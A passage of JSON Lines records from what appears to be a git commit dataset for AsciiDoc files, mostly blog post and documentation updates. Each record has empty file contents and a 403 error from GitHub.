rch,markwalkom\/elasticsearch,spiegela\/elasticsearch,gmarz\/elasticsearch,naveenhooda2000\/elasticsearch,girirajsharma\/elasticsearch,glefloch\/elasticsearch,Shepard1212\/elasticsearch,IanvsPoplicola\/elasticsearch,jimczi\/elasticsearch,ricardocerq\/elasticsearch,wuranbo\/elasticsearch,njlawton\/elasticsearch,nilabhsagar\/elasticsearch,scottsom\/elasticsearch,nilabhsagar\/elasticsearch,cwurm\/elasticsearch,lks21c\/elasticsearch,obourgain\/elasticsearch,wenpos\/elasticsearch,strapdata\/elassandra5-rc,mortonsykes\/elasticsearch,winstonewert\/elasticsearch,mikemccand\/elasticsearch,a2lin\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,naveenhooda2000\/elasticsearch,alexshadow007\/elasticsearch,zkidkid\/elasticsearch,nezirus\/elasticsearch,kalimatas\/elasticsearch,ZTE-PaaS\/elasticsearch,maddin2016\/elasticsearch,C-Bish\/elasticsearch,JervyShi\/elasticsearch,brandonkearby\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,njlawton\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,njlawton\/elasticsearch,JSCooke\/elasticsearch,naveenhooda2000\/elasticsearch,girirajsharma\/elasticsearch,nazarewk\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,fforbeck\/elasticsearch,LewayneNaidoo\/elasticsearch,sneivandt\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,njlawton\/elasticsearch,kalimatas\/elasticsearch,gfyoung\/elasticsearch,naveenhooda2000\/elasticsearch,uschindler\/elasticsearch,ZTE-PaaS\/elasticsearch,jprante\/elasticsearch,StefanGor\/elasticsearch,StefanGor\/elasticsearch,brandonkearby\/elasticsearch,zkidkid\/elasticsearch,alexshadow007\/elasticsearch,gingerwizard\/elasticsearch,avikurapati\/elasticsearch,obourgain\/elasticsearch,rajanm\/elasticsearch,MaineC\/elasticsearch,mjason3\/elasticsearch,JervyShi\/elasticsearch,ricardocerq\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,maddin2016\/elasticsearch,scorpionvicky\/elasticsearch,artnowo\/elasticsearch,awislowski\/elasticsearch,dongjoon-hyun\/elasticsearch,liweinan0423\/elasticsearch,nilabhsagar\/elasticsearch,brandonkearby\/elasticsearch,gmarz\/elasticsearch,njlawton\/elasticsearch,awislowski\/elasticsearch,wuranbo\/elasticsearch,liweinan0423\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,LewayneNaidoo\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,vroyer\/elasticassandra,obourgain\/elasticsearch,markwalkom\/elasticsearch,StefanGor\/elasticsearch,bawse\/elasticsearch,pozhidaevak\/elasticsearch,girirajsharma\/elasticsearch,naveenhooda2000\/elasticsearch,HonzaKral\/elasticsearch,scottsom\/elasticsearch,wuranbo\/elasticsearch,i-am-Nathan\/elasticsearch,spiegela\/elasticsearch,rlugojr\/elasticsearch,Shepard1212\/elasticsearch,obourgain\/elasticsearch,winstonewert\/elasticsearch,nazarewk\/elasticsearch,sreeramjayan\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,coding0011\/elasticsearch,mikemccand\/elasticsearch,JervyShi\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,gfyoung\/elasticsearch,masaruh\/elasticsearch,wenpos\/elasticsearch,fforbeck\/elasticsearch,winstonewert\/elasticsearch,scorpionvicky\/elasticsearch,i-am-Nathan\/elasticsearch,lks21c\/elasticsearch,markwalkom\/elasticsearch,Shepard1212\/elasticsearch,henakamaMSFT\/elasticsearch,vroyer\/elassandra,spiegela\/elasticsearch,mikemccand\/elasticsearch,mohit\/elasticsearch,C-Bish\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,jprant
e\/elasticsearch,pozhidaevak\/elasticsearch,sneivandt\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasticsearch,C-Bish\/elasticsearch,coding0011\/elasticsearch,brandonkearby\/elasticsearch,umeshdangat\/elasticsearch,JSCooke\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,wenpos\/elasticsearch,dpursehouse\/elasticsearch,liweinan0423\/elasticsearch,MisterAndersen\/elasticsearch,fforbeck\/elasticsearch,nazarewk\/elasticsearch,gmarz\/elasticsearch,mortonsykes\/elasticsearch,MaineC\/elasticsearch,geidies\/elasticsearch,markwalkom\/elasticsearch,JervyShi\/elasticsearch,rlugojr\/elasticsearch,fforbeck\/elasticsearch,mohit\/elasticsearch,dpursehouse\/elasticsearch,IanvsPoplicola\/elasticsearch,i-am-Nathan\/elasticsearch,scorpionvicky\/elasticsearch,winstonewert\/elasticsearch,LewayneNaidoo\/elasticsearch,jprante\/elasticsearch,MaineC\/elasticsearch,JSCooke\/elasticsearch,Stacey-Gammon\/elasticsearch,fernandozhu\/elasticsearch","old_file":"docs\/java-api\/docs\/update-by-query.asciidoc","new_file":"docs\/java-api\/docs\/update-by-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a0e4b9eb8203c429f350113c196e9c3e4112690","subject":"Update 2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","message":"Update 2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","new_file":"_posts\/2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c14a402763ec24886ec97ef6dbe9a77b460a3b06","subject":"y2b create post YouTube Sent A Mysterious Package...","message":"y2b create post YouTube Sent A Mysterious Package...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-10-YouTube-Sent-A-Mysterious-Package.adoc","new_file":"_posts\/2017-01-10-YouTube-Sent-A-Mysterious-Package.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d000d17d47da259c8b20f9f55a63743daf59ca07","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c11cce6a8f74c0d864771f2ec0cd979a9d9c11b","subject":"Update 2016-01-24-Puzzle-8-M-A-T-R-I-X.adoc","message":"Update 
2016-01-24-Puzzle-8-M-A-T-R-I-X.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-01-24-Puzzle-8-M-A-T-R-I-X.adoc","new_file":"_posts\/2016-01-24-Puzzle-8-M-A-T-R-I-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b40afb0207051642dde8ea8ddd68b949f1c9a23","subject":"Update 2016-01-15-Smart-classroom-innovando-el-espacio-de-aprendizaje-con-TIC.adoc","message":"Update 2016-01-15-Smart-classroom-innovando-el-espacio-de-aprendizaje-con-TIC.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"_posts\/2016-01-15-Smart-classroom-innovando-el-espacio-de-aprendizaje-con-TIC.adoc","new_file":"_posts\/2016-01-15-Smart-classroom-innovando-el-espacio-de-aprendizaje-con-TIC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8c21c4ae04499d9e1ff4f0489af0cfee13d0b7f","subject":"y2b create post Corsair Vengeance 2000 Wireless Gaming Headset Unboxing \\u0026 Overview","message":"y2b create post Corsair Vengeance 2000 Wireless Gaming Headset Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-05-Corsair-Vengeance-2000-Wireless-Gaming-Headset-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-04-05-Corsair-Vengeance-2000-Wireless-Gaming-Headset-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a9e8273cf55b24226b0bd9204c6513f684a79f2","subject":"Update 2017-04-27-Fin-de-la-venta-anticipada-para-La-Alberca.adoc","message":"Update 2017-04-27-Fin-de-la-venta-anticipada-para-La-Alberca.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2017-04-27-Fin-de-la-venta-anticipada-para-La-Alberca.adoc","new_file":"_posts\/2017-04-27-Fin-de-la-venta-anticipada-para-La-Alberca.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4d30def861ecbe076393f6d7769168c2b505c66","subject":"y2b create post Apple EarPods Review (New Apple EarPods Unboxing, Review \\u0026 Comparison)","message":"y2b create post Apple EarPods Review (New Apple EarPods Unboxing, Review \\u0026 
Comparison)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-15-Apple-EarPods-Review-New-Apple-EarPods-Unboxing-Review-u0026-Comparison.adoc","new_file":"_posts\/2012-09-15-Apple-EarPods-Review-New-Apple-EarPods-Unboxing-Review-u0026-Comparison.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"106587068bb5a5a8b9db28144c1c172f96adc7df","subject":"Introduce the validation problem troubleshooting page","message":"Introduce the validation problem troubleshooting page\n","repos":"gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/troubleshooting\/validation_problems.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/troubleshooting\/validation_problems.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blindpirate\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1edcb5ac661d64fcd540419a30d507ab70849175","subject":"Update 2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","message":"Update 2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","new_file":"_posts\/2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ad8078804b7d7b8429aa9f72f843656ff5042c6","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f682df3e9aecf0774a148af3b9162af1ca36a62","subject":"Update alert-notifiers-for-mobile-devices.adoc","message":"Update 
alert-notifiers-for-mobile-devices.adoc","repos":"ppalaga\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,metlos\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,metlos\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73c701bbd7e0490f368161d9a70d5dfab322f2cb","subject":"Publish 2016-5-13-Engineer-Career-Path.adoc","message":"Publish 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f96e7a43c775bdb5d873be5b1a63bf803428d17a","subject":"update project","message":"update project\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"jpa\/uuid-demo\/readme.adoc","new_file":"jpa\/uuid-demo\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"932ca89fb600ca4096b4b58306312790f4f2f504","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 
2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f3941074c8845ca0625fba4adf0e8f95c43de91","subject":"Add error handling docs","message":"Add error handling docs\n","repos":"wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom","old_file":"docs-src\/modules\/ROOT\/pages\/core\/error-handling.adoc","new_file":"docs-src\/modules\/ROOT\/pages\/core\/error-handling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wilkerlucio\/pathom.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57ff6816ba9f8657bd4983435caf512f32b18ed1","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa9eaa2ae2d58a4eb184ad2479cf48da056033b0","subject":"Update 2016-03-10-My-first-article.adoc","message":"Update 2016-03-10-My-first-article.adoc","repos":"nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io","old_file":"_posts\/2016-03-10-My-first-article.adoc","new_file":"_posts\/2016-03-10-My-first-article.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nnn-dev\/nnn-dev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c456a0ff1c9bcd0743ffbfb6c75356e7b7ff2a5","subject":"Publish 2016-6-29-PHPER-RBAC.adoc","message":"Publish 2016-6-29-PHPER-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-29-PHPER-RBAC.adoc","new_file":"2016-6-29-PHPER-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f4a588af12c2a905de560f6d4676990123e9d9f","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 
2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dfdd7d247ac6ef6cca0d5b9fea200149bfbb67f","subject":"Update 2015-07-31-HitachiId.adoc","message":"Update 2015-07-31-HitachiId.adoc","repos":"liyucun\/blog,liyucun\/blog,liyucun\/blog","old_file":"_posts\/2015-07-31-HitachiId.adoc","new_file":"_posts\/2015-07-31-HitachiId.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liyucun\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca531b9bdde68b1fe869ee7c2882e81eb898480f","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bd0b6debc7f67a5ea227db72346d6b126cdde4b","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"470fab430d91bd14204cd8a1f2f1483cb2076702","subject":"Update 2017-12-23-Good-Luck.adoc","message":"Update 2017-12-23-Good-Luck.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-12-23-Good-Luck.adoc","new_file":"_posts\/2017-12-23-Good-Luck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c598c08916cf229d1d1a53265558fc6beb24aa2","subject":"y2b create post Star Wars X Adidas Originals - Death Star Conductor Hi - Unboxing \\u0026 Overview","message":"y2b create post Star Wars X Adidas Originals - Death Star Conductor Hi - Unboxing \\u0026 
Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-11-Star-Wars-X-Adidas-Originals--Death-Star-Conductor-Hi--Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-11-Star-Wars-X-Adidas-Originals--Death-Star-Conductor-Hi--Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"041a5518c45bb302952e4b380d3c9c8cd858ee6d","subject":"Update 2015-07-01-Hybirs-Define-local-Config-for-specific-environment.adoc","message":"Update 2015-07-01-Hybirs-Define-local-Config-for-specific-environment.adoc","repos":"jlboes\/jlboes.github.io,jlboes\/jlboes.github.io,jlboes\/jlboes.github.io","old_file":"_posts\/2015-07-01-Hybirs-Define-local-Config-for-specific-environment.adoc","new_file":"_posts\/2015-07-01-Hybirs-Define-local-Config-for-specific-environment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jlboes\/jlboes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9194859a5e74637e1ef7e61382840bca4d4daaa6","subject":"Typo URL conf","message":"Typo URL conf\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Graded exercices.adoc","new_file":"Git\/Graded exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fe263b38d6357157154c50e804a8d929af57aa8","subject":"Update 2015-12-18-Hello-World-21.adoc","message":"Update 2015-12-18-Hello-World-21.adoc","repos":"jaslyn94\/jaslyn94.github.io,jaslyn94\/jaslyn94.github.io,jaslyn94\/jaslyn94.github.io","old_file":"_posts\/2015-12-18-Hello-World-21.adoc","new_file":"_posts\/2015-12-18-Hello-World-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaslyn94\/jaslyn94.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7313d643d5322225b8e05144e4c3311869d91cd2","subject":"Update 2018-02-03-NSUCRYPTO-2017.adoc","message":"Update 2018-02-03-NSUCRYPTO-2017.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2018-02-03-NSUCRYPTO-2017.adoc","new_file":"_posts\/2018-02-03-NSUCRYPTO-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f100c6c2a78bc40d914f3e2c0e6912b3bf3191c","subject":"y2b create post Moto X Unboxing (Find Out Why It's One Of My Favorites!)","message":"y2b create post Moto X Unboxing (Find Out Why It's One Of My 
Favorites!)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-27-Moto-X-Unboxing-Find-Out-Why-Its-One-Of-My-Favorites.adoc","new_file":"_posts\/2013-09-27-Moto-X-Unboxing-Find-Out-Why-Its-One-Of-My-Favorites.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"220519625f953126b4fdfdc23cbf6afb419940fe","subject":"y2b create post The DIY Jacket Upgrade, Thank Me Later","message":"y2b create post The DIY Jacket Upgrade, Thank Me Later","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-07-The%20DIY%20Jacket%20Upgrade%2C%20Thank%20Me%20Later.adoc","new_file":"_posts\/2018-01-07-The%20DIY%20Jacket%20Upgrade%2C%20Thank%20Me%20Later.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ece9df55eca1fad0878ecf48a916c06a2afd6e5b","subject":"CAMEL-17117: preliminary documentation for the resume strategy","message":"CAMEL-17117: preliminary documentation for the resume strategy\n","repos":"adessaigne\/camel,adessaigne\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,christophd\/camel,cunningt\/camel,cunningt\/camel,adessaigne\/camel,apache\/camel,cunningt\/camel,tadayosi\/camel,adessaigne\/camel,adessaigne\/camel,christophd\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,apache\/camel,tadayosi\/camel,apache\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,apache\/camel,adessaigne\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel","old_file":"core\/camel-core-engine\/src\/main\/docs\/modules\/eips\/pages\/resume-strategies.adoc","new_file":"core\/camel-core-engine\/src\/main\/docs\/modules\/eips\/pages\/resume-strategies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44e28ae38a4995bd8ea8f9fb8d8cb4562e93349f","subject":"y2b create post PS4 Problems (DualShock 4 Controller)","message":"y2b create post PS4 Problems (DualShock 4 Controller)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-17-PS4-Problems-DualShock-4-Controller.adoc","new_file":"_posts\/2014-01-17-PS4-Problems-DualShock-4-Controller.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 